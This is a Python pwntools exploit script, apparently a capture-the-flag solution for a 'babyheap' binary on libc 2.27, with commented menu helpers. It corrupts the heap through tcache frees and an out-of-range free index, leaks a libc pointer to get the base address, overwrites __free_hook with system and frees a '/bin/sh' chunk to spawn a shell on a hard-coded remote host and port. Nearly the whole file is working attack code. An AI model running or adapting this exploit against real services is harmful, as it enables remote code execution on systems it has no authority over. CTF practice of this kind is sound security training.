from pwn import *
from hashlib import sha256
from pwnlib.util.iters import count

# Log every byte exchanged with the tube and set the word size pwntools
# assumes for packing helpers; both are read from the global `context`.
context.log_level = "debug"
context.arch = "amd64"

# Target binary and the libc shipped with it. `libc.sym[...]` is used later
# to resolve symbol offsets; `elf` is loaded but not referenced in this file.
elf = ELF("./babyheap")
libc = ELF("./libc-2.27.so")
def add(size, content):
    """Drive menu option 1: request a chunk of *size* bytes holding *content*.

    Waits for the ``>>> `` prompt, selects option 1, answers the size prompt
    (which the binary labels ``idx is ``), then sends *content* verbatim
    after the content prompt -- ``sendafter``, so no trailing newline.
    """
    menu_choice = b"1"
    size_field = str(size).encode()
    p.sendlineafter(b">>> ", menu_choice)
    p.sendlineafter(b"idx is ", size_field)
    p.sendafter(b"next the content: ", content)
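def show(idx):
    """Drive menu option 2: ask the binary to print the chunk at *idx*.

    Only the request is sent here; whatever the binary prints is left on
    ``p`` for the caller to read (the main flow does this after ``show(0)``).
    """
    p.sendlineafter(b">>> ", b"2")
    p.sendlineafter(b"house index: ", str(idx).encode())


def edit(idx, content):
    """Drive menu option 3: overwrite the chunk at *idx* with *content*.

    The binary's prompt reads ``content(size 8)``, so *content* is presumably
    expected to be exactly 8 bytes -- the caller passes ``p64(...)``.
    """
    # Menu choice as bytes, consistent with the other helpers; the original
    # sent the str "3", which pwntools has to coerce to bytes on the way out.
    p.sendlineafter(b">>> ", b"3")
    p.sendlineafter(b"house index: ", str(idx).encode())
    p.sendafter(b"content(size 8): ", content)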
def delete(idx):
    """Drive menu option 4: free the chunk at *idx*.

    Sends the menu choice, then the index as decimal text after the
    ``house index: `` prompt. Nothing is read back.
    """
    index_field = str(idx).encode()
    p.sendlineafter(b">>> ", b"4")
    p.sendlineafter(b"house index: ", index_field)
# Hard-coded remote endpoint; the port is passed as a string and left to
# pwntools to convert.
p = remote("47.98.229.103", "1337")

# Fill eight slots (indices 0-7) with 0x1F0-byte chunks, then free slots 1-7
# in ascending order, leaving slot 0 allocated.
for _ in range(8):
    add(0x1F0, b"a" * 0x1F0)
for slot in range(1, 8):
    delete(slot)

# A large index far outside 0-7. The page does not show how the binary
# validates indices, so why this call is useful cannot be confirmed here.
delete(1953723762)

# Print slot 0 and turn the leaked pointer into a libc base: read up to the
# first 0x7f byte, keep the last six bytes, zero-extend to eight, and subtract
# a fixed offset (0x3ebca0) that is specific to the bundled libc-2.27.so.
show(0)
leak_tail = p.recvuntil(b"\x7f")[-6:]
leaked_ptr = u64(leak_tail.ljust(8, b"\x00"))
libc_base = leaked_ptr - 0x3ebca0
log.info("libc_base: " + hex(libc_base))

add(0x8, b"b" * 0x8)
delete(1953723762)

# Write the resolved __free_hook address into slot 1, then perform two
# 8-byte allocations: one holding "/bin/sh", one holding system's address.
edit(1, p64(libc_base + libc.sym["__free_hook"]))
add(0x8, b"/bin/sh\x00")
add(0x8, p64(libc_base + libc.sym["system"]))

delete(2)
p.interactive()